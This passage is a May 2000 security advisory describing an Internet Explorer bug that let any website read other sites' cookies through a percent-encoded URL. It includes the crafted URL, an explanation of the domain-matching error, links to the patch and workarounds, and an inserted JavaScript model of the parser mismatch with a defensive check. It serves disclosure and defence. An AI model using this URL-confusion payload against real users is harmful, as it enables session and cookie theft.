Peacefire.org
Internet Explorer "Open Cookie Jar"
Cookies stored by IE for Windows can be read by any Web site

Bennett Haselton, bennett@peacefire.org
Jamie McCarthy, jamie@mccarthy.vg
5/11/2000

News sightings: Wall Street Journal | NYTimes (Note) | CNNfn | Slashdot | CNet | Internet News Radio | Newsbytes
MSNBC | ComputerWorld | National Post | WebDeveloper.com

See also:
JavaScript-in-cookies security hole (4/19/00) C-Net | ZDNet | NTSecurity | MSNBC
Eudora "stealth attachment" demo page (4/27/00) C-Net | ZDNet | Newsbytes | The Register
Internet Explorer "local JavaScript" security hole (5/5/00) C-Net | NewsBytes
"Fake mail form" security hole for Web-based email sites (5/9/00) C-Net | CNN.com
HotMail Attachment security hole (5/10/00) Wired | ZDNet | Slashdot | MSNBC | CNN.com

Any Web site that uses cookies to authenticate users or store private information -- including Amazon.com, HotMail, Yahoo Mail, DoubleClick, MP3.com, NYTimes.com, and thousands of others -- could have cookies exposed by Internet Explorer and intercepted by a third-party Web site.

Update 5/18/2000: Microsoft has released a patch that will fix this vulnerability in Internet Explorer:
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp

If you have Internet Explorer for Windows, type a domain (e.g. "yahoo.com" or "hotmail.msn.com") into the demonstration form and click the button; a page on Peacefire.org will load and display your cookie for that domain.

Or you can go to a demonstration at the following URL, to see a list of information that is exposed by cookies set from Amazon.com, MP3.com, and other popular sites:
http://www.securityspace.com/exploit/exploit_1c.html (hosted by securityspace.com)

Pascal Gaudette reported that the same scheme works for HTTPS cookies as long as the server referenced by the "malformed URL" is itself HTTPS-enabled. You can use the second form to read HTTPS cookies (enter a domain name and click the button).

How it works
Using a specially constructed URL, a Web site can read Internet Explorer cookies set by any domain. For example, to read a user's Amazon.com cookie, a site could direct the user's browser to:
http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com
Decode each "%2f" as "/" and the "%3F" as "?", and this URL is actually:
http://www.peacefire.org/security/iecookies/showcookie.html?.amazon.com
IE does connect to www.peacefire.org and load that page. But the code that decides which cookies the page may see evidently works on the still-encoded string: with no literal "/" in it, the whole string up to the end is taken as the host name, and that host name ends in ".amazon.com". Since cookie domain matching is a suffix match, IE concludes that the page belongs to the Amazon.com domain and lets it read the user's Amazon.com cookie (for instance through document.cookie), which the page can then display or send back to its own server.
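The following is an added example, not code from the Peacefire page or from Microsoft: it models the two views of the host name that the "Open Cookie Jar" URL produces. One function extracts the host from the raw, still-encoded URL (the behaviour the advisory attributes to IE's cookie code), another percent-decodes first (what the network layer effectively did), and a Netscape-style suffix match then shows which cookies each view would hand to the page. The cookie jar, the function names and the consistency check at the end are my own constructions; the URL is the one from the advisory.

```javascript
// Added example (not part of the Peacefire advisory). Models the parser
// disagreement behind the IE "Open Cookie Jar" bug. Function names and the
// sample cookie jar are constructed for illustration.

const MALFORMED_URL =
  "http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com";

// Parser A: host taken from the raw string before any percent-decoding.
// Everything up to the first literal "/", "?" or "#" is treated as the host,
// so with the encoded URL the "host" runs all the way to ".amazon.com".
function hostBeforeDecoding(url) {
  const afterScheme = url.slice(url.indexOf("://") + 3);
  return afterScheme.split(/[/?#]/)[0];
}

// Parser B: percent-decode first, then split. This is the host the request
// was really sent to (www.peacefire.org).
function hostAfterDecoding(url) {
  return hostBeforeDecoding(decodeURIComponent(url));
}

// Netscape-style cookie domain match: a cookie set for ".amazon.com" is sent
// to "amazon.com" and to any host whose name ends in ".amazon.com".
function cookieDomainMatches(host, cookieDomain) {
  const h = host.toLowerCase();
  const d = cookieDomain.toLowerCase();
  const bare = d.replace(/^\./, "");
  return h === bare || h.endsWith("." + bare);
}

// Constructed cookie jar standing in for the user's stored IE cookies.
const COOKIE_JAR = [
  { domain: ".amazon.com", name: "session-id", value: "000-0000000-0000000" },
  { domain: ".peacefire.org", name: "visited", value: "1" },
];

// Names of the cookies a browser using `hostFn` would expose to a page at `url`.
function cookiesSentTo(url, hostFn, jar = COOKIE_JAR) {
  const host = hostFn(url);
  return jar.filter((c) => cookieDomainMatches(host, c.domain)).map((c) => c.name);
}

// Defensive check: accept a URL only if a standards-conforming parser accepts
// it AND both of the above views agree with it about the host. The WHATWG
// parser rejects a host that decodes to contain "/" or "?", so the malformed
// URL fails here before any cookie logic runs.
function hostIsConsistent(url) {
  let canonical;
  try {
    canonical = new URL(url).hostname;
  } catch {
    return false;
  }
  return canonical === hostBeforeDecoding(url) && canonical === hostAfterDecoding(url);
}

console.log("cookie code's view :", hostBeforeDecoding(MALFORMED_URL));
console.log("network layer's view:", hostAfterDecoding(MALFORMED_URL));
console.log("cookies exposed     :", cookiesSentTo(MALFORMED_URL, hostBeforeDecoding));
console.log("URL consistent?     :", hostIsConsistent(MALFORMED_URL));
```

Run with Node: the encoded-string view yields the Amazon.com session cookie (and not even Peacefire's own), the decoded view yields only the Peacefire cookie, and the consistency check rejects the URL outright. The general lesson is the one the advisory illustrates: any component that makes a security decision on a URL must use the same canonical parse as the component that acts on it.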

Affected:
Internet Explorer (all known versions) for Windows 95, 98, NT, and 2000. IE for the Macintosh does not appear to be affected. Users have reported that IE versions for Solaris and HP/UX are vulnerable, but IE's browser share on UNIX platforms is much lower. No version of Netscape Navigator or any browser other than Internet Explorer appears to be vulnerable.

Workaround:
As of 5/18/2000, Microsoft has released a patch that fixes this problem:
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp
If you do not want to install the patch, the safest workaround is to disable cookies. Go to
Tools->Internet Options->Security
click the button to customize security settings, and set cookies to "Disable". (Note that this will break some sites, such as HotMail, that require cookies.) Alternatively, if you have Netscape's browser installed, you can use it instead; it is not affected by the bug.

Implications

Jamie McCarthy came up with a list of cookies set by various sites that could be used to retrieve sensitive information: